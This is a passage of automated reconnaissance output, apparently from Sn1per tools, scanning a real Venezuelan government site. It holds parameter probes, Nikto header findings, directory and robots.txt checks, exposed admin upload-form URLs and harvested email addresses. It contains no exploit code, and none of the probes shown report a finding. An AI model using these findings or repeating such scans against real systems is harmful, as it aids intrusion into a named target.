  1182. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1183. |_[ + ] More details:: / - / , ISP:
  1184. |_[ + ] Found:: UNIDENTIFIED
  1185.  
  1186. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1187. |_[ + ] [ 52 / 100 ]-[20:52:11] [ - ]
  1188. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=226 ]
  1189. |_[ + ] Exploit::
  1190. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1191. |_[ + ] More details:: / - / , ISP:
  1192. |_[ + ] Found:: UNIDENTIFIED
  1193.  
  1194. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1195. |_[ + ] [ 53 / 100 ]-[20:52:15] [ - ]
  1196. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=123 ]
  1197. |_[ + ] Exploit::
  1198. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1199. |_[ + ] More details:: / - / , ISP:
  1200. |_[ + ] Found:: UNIDENTIFIED
  1201.  
  1202. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1203. |_[ + ] [ 54 / 100 ]-[20:52:17] [ - ]
  1204. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1267 ]
  1205. |_[ + ] Exploit::
  1206. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1207. |_[ + ] More details:: / - / , ISP:
  1208. |_[ + ] Found:: UNIDENTIFIED
  1209.  
  1210. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1211. |_[ + ] [ 55 / 100 ]-[20:52:20] [ - ]
  1212. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=533 ]
  1213. |_[ + ] Exploit::
  1214. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1215. |_[ + ] More details:: / - / , ISP:
  1216. |_[ + ] Found:: UNIDENTIFIED
  1217.  
  1218. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1219. |_[ + ] [ 56 / 100 ]-[20:52:23] [ - ]
  1220. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=357 ]
  1221. |_[ + ] Exploit::
  1222. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1223. |_[ + ] More details:: / - / , ISP:
  1224. |_[ + ] Found:: UNIDENTIFIED
  1225.  
  1226. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1227. |_[ + ] [ 57 / 100 ]-[20:52:27] [ - ]
  1228. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=190 ]
  1229. |_[ + ] Exploit::
  1230. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1231. |_[ + ] More details:: / - / , ISP:
  1232. |_[ + ] Found:: UNIDENTIFIED
  1233.  
  1234. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1235. |_[ + ] [ 58 / 100 ]-[20:52:30] [ - ]
  1236. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=183 ]
  1237. |_[ + ] Exploit::
  1238. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1239. |_[ + ] More details:: / - / , ISP:
  1240. |_[ + ] Found:: UNIDENTIFIED
  1241.  
  1242. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1243. |_[ + ] [ 59 / 100 ]-[20:52:33] [ - ]
  1244. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=248 ]
  1245. |_[ + ] Exploit::
  1246. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1247. |_[ + ] More details:: / - / , ISP:
  1248. |_[ + ] Found:: UNIDENTIFIED
  1249.  
  1250. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1251. |_[ + ] [ 60 / 100 ]-[20:52:36] [ - ]
  1252. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=677 ]
  1253. |_[ + ] Exploit::
  1254. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1255. |_[ + ] More details:: / - / , ISP:
  1256. |_[ + ] Found:: UNIDENTIFIED
  1257.  
  1258. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1259. |_[ + ] [ 61 / 100 ]-[20:52:39] [ - ]
  1260. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=977 ]
  1261. |_[ + ] Exploit::
  1262. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1263. |_[ + ] More details:: / - / , ISP:
  1264. |_[ + ] Found:: UNIDENTIFIED
  1265.  
  1266. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1267. |_[ + ] [ 62 / 100 ]-[20:52:42] [ - ]
  1268. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=724 ]
  1269. |_[ + ] Exploit::
  1270. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1271. |_[ + ] More details:: / - / , ISP:
  1272. |_[ + ] Found:: UNIDENTIFIED
  1273.  
  1274. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1275. |_[ + ] [ 63 / 100 ]-[20:52:44] [ - ]
  1276. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=713 ]
  1277. |_[ + ] Exploit::
  1278. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1279. |_[ + ] More details:: / - / , ISP:
  1280. |_[ + ] Found:: UNIDENTIFIED
  1281.  
  1282. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1283. |_[ + ] [ 64 / 100 ]-[20:52:47] [ - ]
  1284. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1297 ]
  1285. |_[ + ] Exploit::
  1286. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1287. |_[ + ] More details:: / - / , ISP:
  1288. |_[ + ] Found:: UNIDENTIFIED
  1289.  
  1290. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1291. |_[ + ] [ 65 / 100 ]-[20:52:50] [ - ]
  1292. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=732 ]
  1293. |_[ + ] Exploit::
  1294. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1295. |_[ + ] More details:: / - / , ISP:
  1296. |_[ + ] Found:: UNIDENTIFIED
  1297.  
  1298. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1299. |_[ + ] [ 66 / 100 ]-[20:52:53] [ - ]
  1300. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1498 ]
  1301. |_[ + ] Exploit::
  1302. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1303. |_[ + ] More details:: / - / , ISP:
  1304. |_[ + ] Found:: UNIDENTIFIED
  1305.  
  1306. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1307. |_[ + ] [ 67 / 100 ]-[20:52:56] [ - ]
  1308. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=332 ]
  1309. |_[ + ] Exploit::
  1310. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1311. |_[ + ] More details:: / - / , ISP:
  1312. |_[ + ] Found:: UNIDENTIFIED
  1313.  
  1314. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1315. |_[ + ] [ 68 / 100 ]-[20:52:59] [ - ]
  1316. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1529 ]
  1317. |_[ + ] Exploit::
  1318. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1319. |_[ + ] More details:: / - / , ISP:
  1320. |_[ + ] Found:: UNIDENTIFIED
  1321.  
  1322. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1323. |_[ + ] [ 69 / 100 ]-[20:53:02] [ - ]
  1324. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1243 ]
  1325. |_[ + ] Exploit::
  1326. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1327. |_[ + ] More details:: / - / , ISP:
  1328. |_[ + ] Found:: UNIDENTIFIED
  1329.  
  1330. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1331. |_[ + ] [ 70 / 100 ]-[20:53:05] [ - ]
  1332. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=549 ]
  1333. |_[ + ] Exploit::
  1334. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1335. |_[ + ] More details:: / - / , ISP:
  1336. |_[ + ] Found:: UNIDENTIFIED
  1337.  
  1338. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1339. |_[ + ] [ 71 / 100 ]-[20:53:08] [ - ]
  1340. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=375 ]
  1341. |_[ + ] Exploit::
  1342. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1343. |_[ + ] More details:: / - / , ISP:
  1344. |_[ + ] Found:: UNIDENTIFIED
  1345.  
  1346. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1347. |_[ + ] [ 72 / 100 ]-[20:53:11] [ - ]
  1348. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=751 ]
  1349. |_[ + ] Exploit::
  1350. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1351. |_[ + ] More details:: / - / , ISP:
  1352. |_[ + ] Found:: UNIDENTIFIED
  1353.  
  1354. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1355. |_[ + ] [ 73 / 100 ]-[20:53:14] [ - ]
  1356. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=165 ]
  1357. |_[ + ] Exploit::
  1358. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1359. |_[ + ] More details:: / - / , ISP:
  1360. |_[ + ] Found:: UNIDENTIFIED
  1361.  
  1362. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1363. |_[ + ] [ 74 / 100 ]-[20:53:18] [ - ]
  1364. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=136 ]
  1365. |_[ + ] Exploit::
  1366. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1367. |_[ + ] More details:: / - / , ISP:
  1368. |_[ + ] Found:: UNIDENTIFIED
  1369.  
  1370. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1371. |_[ + ] [ 75 / 100 ]-[20:53:24] [ - ]
  1372. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=949 ]
  1373. |_[ + ] Exploit::
  1374. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1375. |_[ + ] More details:: / - / , ISP:
  1376. |_[ + ] Found:: UNIDENTIFIED
  1377. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 18245 bytes received
  1378.  
  1379. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1380. |_[ + ] [ 76 / 100 ]-[20:53:29] [ - ]
  1381. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=360 ]
  1382. |_[ + ] Exploit::
  1383. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1384. |_[ + ] More details:: / - / , ISP:
  1385. |_[ + ] Found:: UNIDENTIFIED
  1386.  
  1387. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1388. |_[ + ] [ 77 / 100 ]-[20:53:33] [ - ]
  1389. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1247 ]
  1390. |_[ + ] Exploit::
  1391. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1392. |_[ + ] More details:: / - / , ISP:
  1393. |_[ + ] Found:: UNIDENTIFIED
  1394.  
  1395. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1396. |_[ + ] [ 78 / 100 ]-[20:53:37] [ - ]
  1397. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=867 ]
  1398. |_[ + ] Exploit::
  1399. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1400. |_[ + ] More details:: / - / , ISP:
  1401. |_[ + ] Found:: UNIDENTIFIED
  1402.  
  1403. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1404. |_[ + ] [ 79 / 100 ]-[20:53:41] [ - ]
  1405. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=84 ]
  1406. |_[ + ] Exploit::
  1407. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1408. |_[ + ] More details:: / - / , ISP:
  1409. |_[ + ] Found:: UNIDENTIFIED
  1410.  
  1411. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1412. |_[ + ] [ 80 / 100 ]-[20:53:44] [ - ]
  1413. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=363 ]
  1414. |_[ + ] Exploit::
  1415. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1416. |_[ + ] More details:: / - / , ISP:
  1417. |_[ + ] Found:: UNIDENTIFIED
  1418.  
  1419. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1420. |_[ + ] [ 81 / 100 ]-[20:53:47] [ - ]
  1421. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1434 ]
  1422. |_[ + ] Exploit::
  1423. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1424. |_[ + ] More details:: / - / , ISP:
  1425. |_[ + ] Found:: UNIDENTIFIED
  1426.  
  1427. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1428. |_[ + ] [ 82 / 100 ]-[20:53:50] [ - ]
  1429. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=160 ]
  1430. |_[ + ] Exploit::
  1431. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1432. |_[ + ] More details:: / - / , ISP:
  1433. |_[ + ] Found:: UNIDENTIFIED
  1434.  
  1435. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1436. |_[ + ] [ 83 / 100 ]-[20:53:53] [ - ]
  1437. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=87 ]
  1438. |_[ + ] Exploit::
  1439. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1440. |_[ + ] More details:: / - / , ISP:
  1441. |_[ + ] Found:: UNIDENTIFIED
  1442.  
  1443. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1444. |_[ + ] [ 84 / 100 ]-[20:53:58] [ - ]
  1445. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=110 ]
  1446. |_[ + ] Exploit::
  1447. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1448. |_[ + ] More details:: / - / , ISP:
  1449. |_[ + ] Found:: UNIDENTIFIED
  1450.  
  1451. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1452. |_[ + ] [ 85 / 100 ]-[20:54:01] [ - ]
  1453. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1361 ]
  1454. |_[ + ] Exploit::
  1455. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1456. |_[ + ] More details:: / - / , ISP:
  1457. |_[ + ] Found:: UNIDENTIFIED
  1458.  
  1459. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1460. |_[ + ] [ 86 / 100 ]-[20:54:03] [ - ]
  1461. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=933 ]
  1462. |_[ + ] Exploit::
  1463. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1464. |_[ + ] More details:: / - / , ISP:
  1465. |_[ + ] Found:: UNIDENTIFIED
  1466.  
  1467. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1468. |_[ + ] [ 87 / 100 ]-[20:54:07] [ - ]
  1469. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1321 ]
  1470. |_[ + ] Exploit::
  1471. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1472. |_[ + ] More details:: / - / , ISP:
  1473. |_[ + ] Found:: UNIDENTIFIED
  1474.  
  1475. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1476. |_[ + ] [ 88 / 100 ]-[20:54:09] [ - ]
  1477. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=175 ]
  1478. |_[ + ] Exploit::
  1479. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1480. |_[ + ] More details:: / - / , ISP:
  1481. |_[ + ] Found:: UNIDENTIFIED
  1482.  
  1483. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1484. |_[ + ] [ 89 / 100 ]-[20:54:13] [ - ]
  1485. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=1279 ]
  1486. |_[ + ] Exploit::
  1487. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1488. |_[ + ] More details:: / - / , ISP:
  1489. |_[ + ] Found:: UNIDENTIFIED
  1490.  
  1491. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1492. |_[ + ] [ 90 / 100 ]-[20:54:16] [ - ]
  1493. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=511 ]
  1494. |_[ + ] Exploit::
  1495. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1496. |_[ + ] More details:: / - / , ISP:
  1497. |_[ + ] Found:: UNIDENTIFIED
  1498.  
  1499. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1500. |_[ + ] [ 91 / 100 ]-[20:54:19] [ - ]
  1501. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=509 ]
  1502. |_[ + ] Exploit::
  1503. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1504. |_[ + ] More details:: / - / , ISP:
  1505. |_[ + ] Found:: UNIDENTIFIED
  1506.  
  1507. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1508. |_[ + ] [ 92 / 100 ]-[20:54:22] [ - ]
  1509. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=748 ]
  1510. |_[ + ] Exploit::
  1511. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1512. |_[ + ] More details:: / - / , ISP:
  1513. |_[ + ] Found:: UNIDENTIFIED
  1514.  
  1515. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1516. |_[ + ] [ 93 / 100 ]-[20:54:28] [ - ]
  1517. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=100 ]
  1518. |_[ + ] Exploit::
  1519. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1520. |_[ + ] More details:: / - / , ISP:
  1521. |_[ + ] Found:: UNIDENTIFIED
  1522. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 58722 bytes received
  1523.  
  1524. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1525. |_[ + ] [ 94 / 100 ]-[20:54:31] [ - ]
  1526. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=107 ]
  1527. |_[ + ] Exploit::
  1528. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1529. |_[ + ] More details:: / - / , ISP:
  1530. |_[ + ] Found:: UNIDENTIFIED
  1531.  
  1532. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1533. |_[ + ] [ 95 / 100 ]-[20:54:34] [ - ]
  1534. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=809 ]
  1535. |_[ + ] Exploit::
  1536. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1537. |_[ + ] More details:: / - / , ISP:
  1538. |_[ + ] Found:: UNIDENTIFIED
  1539.  
  1540. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1541. |_[ + ] [ 96 / 100 ]-[20:54:37] [ - ]
  1542. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=542 ]
  1543. |_[ + ] Exploit::
  1544. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1545. |_[ + ] More details:: / - / , ISP:
  1546. |_[ + ] Found:: UNIDENTIFIED
  1547.  
  1548. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1549. |_[ + ] [ 97 / 100 ]-[20:54:40] [ - ]
  1550. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=445 ]
  1551. |_[ + ] Exploit::
  1552. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1553. |_[ + ] More details:: / - / , ISP:
  1554. |_[ + ] Found:: UNIDENTIFIED
  1555.  
  1556. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1557. |_[ + ] [ 98 / 100 ]-[20:54:43] [ - ]
  1558. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=253 ]
  1559. |_[ + ] Exploit::
  1560. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1561. |_[ + ] More details:: / - / , ISP:
  1562. |_[ + ] Found:: UNIDENTIFIED
  1563.  
  1564. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1565. |_[ + ] [ 99 / 100 ]-[20:54:46] [ - ]
  1566. |_[ + ] Target:: [ http://www.minppibes.gob.ve/web-final/noticias.php?id_noticia_busqueda=170 ]
  1567. |_[ + ] Exploit::
  1568. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:150.188.25.46:80
  1569. |_[ + ] More details:: / - / , ISP:
  1570. |_[ + ] Found:: UNIDENTIFIED
  1571.  
  1572. [ INFO ] [ Shutting down ]
  1573. [ INFO ] [ End of process INURLBR at [01-09-2018 20:54:46]
  1574. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
  1575. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-minppibes.gob.ve.txt ]
  1576. |_________________________________________________________________________________________
  1577.  
  1578. \_________________________________________________________________________________________/
  1579.  
  1580. ######################################################################################################################################
  1581. ---------------------------------------------------------------------------------------------------------------------------------------
  1582. + Target IP: 150.188.25.46
  1583. + Target Hostname: www.minppibes.gob.ve
  1584. + Target Port: 80
  1585. + Start Time: 2018-09-01 20:30:35 (GMT-4)
  1586. ---------------------------------------------------------------------------------------------------------------------------------------
  1587. + Server: Apache/2.4.10 (Debian)
  1588. + Server leaks inodes via ETags, header found with file /, fields: 0x894 0x572d69c47e55e
  1589. + The anti-clickjacking X-Frame-Options header is not present.
  1590. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  1591. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  1592. + Entry '/calendario/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
  1593. + Entry '/css/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
  1594. + "robots.txt" contains 6 entries which should be manually viewed.
  1595. + Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
  1596. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
  1597. #######################################################################################################################################
  1598. =======================================================================================================================================
  1599. | Domain: http://minppibes.gob.ve/
  1600. | Server: Apache/2.4.10 (Debian)
  1601. | IP: 150.188.25.46
  1602. =======================================================================================================================================
  1603. |
  1604. | Directory check:
  1605. | [+] CODE: 200 URL: http://minppibes.gob.ve/calendario/
  1606. | [+] CODE: 200 URL: http://minppibes.gob.ve/css/
  1607. | [+] CODE: 200 URL: http://minppibes.gob.ve/institucional/
  1608. | [+] CODE: 200 URL: http://minppibes.gob.ve/monitor/
  1609. =======================================================================================================================================
  1610. |
  1611. | File check:
  1612. | [+] CODE: 200 URL: http://minppibes.gob.ve/css
  1613. | [+] CODE: 200 URL: http://minppibes.gob.ve/index.html
  1614. | [+] CODE: 200 URL: http://minppibes.gob.ve/robots.txt
  1615. =======================================================================================================================================
  1616. |
  1617. | Check robots.txt:
  1618. | [+] User-agent: *
  1619. | [+] Disallow: /calendario/
  1620. | [+] Disallow: /css/
  1621. | [+] Disallow: /institucional/
  1622. | [+] Allow: /web-final/
  1623. | [+] Allow: /*.css$
  1624. | [+] Allow: /*.js$
  1625. |
  1626. | Check sitemap.xml:
  1627. =======================================================================================================================================
  1628. #######################################################################################################################################
  1629. | File Upload Forms:
  1630. | [+] Upload Form Found: http://minppibes.gob.ve//institucional/sistemas/web_min_ppibes_mc/Visual_Admin/preferences.html
  1631. | [+] Upload Form Found: http://minppibes.gob.ve/institucional/sistemas/web_min_ppibes_mc/Visual_Admin/preferences.html
  1632. |
  1633. #######################################################################################################################################
  1634. | External hosts:
  1635. | [+] External Host Found: https://www.google.com
  1636. | [+] External Host Found: https://oss.maxcdn.com
  1637. |
  1638. | E-mails:
  1639. | [+] E-mail Found: js@company.com
  1640. | [+] E-mail Found: wb@company.com
  1641. | [+] E-mail Found: regifor@minppibes.gob.ve
  1642. | [+] E-mail Found: se@company.com
  1643. | [+] E-mail Found: mj@company.com
  1644. | [+] E-mail Found: ls@company.com
  1645. | [+] E-mail Found: bj@company.com
  1646. | [+] E-mail Found: denunciaalasmafias@gmail.com
  1647. | [+] E-mail Found: js@dashboard.com
  1648. | [+] E-mail Found: sb@company.com
  1649. | [+] E-mail Found: admin@company.com
  1650. | [+] E-mail Found: pr@company.com
  1651. #######################################################################################################################################
  1652. http://minppibes.gob.ve//institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Cargar_t_noticia_RegistrosCarga/adjunto_t_noticia644_1.
  1653. | http://minppibes.gob.ve/institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Cargar_t_noticia_RegistrosCarga/adjunto_t_noticia793_1.
  1654. | http://minppibes.gob.ve/institucional/sistemas/web_min_ppibes_mc/imagenes/adjuntos/Cargar_t_noticia_RegistrosCarga/adjunto_t_noticia1110_1.
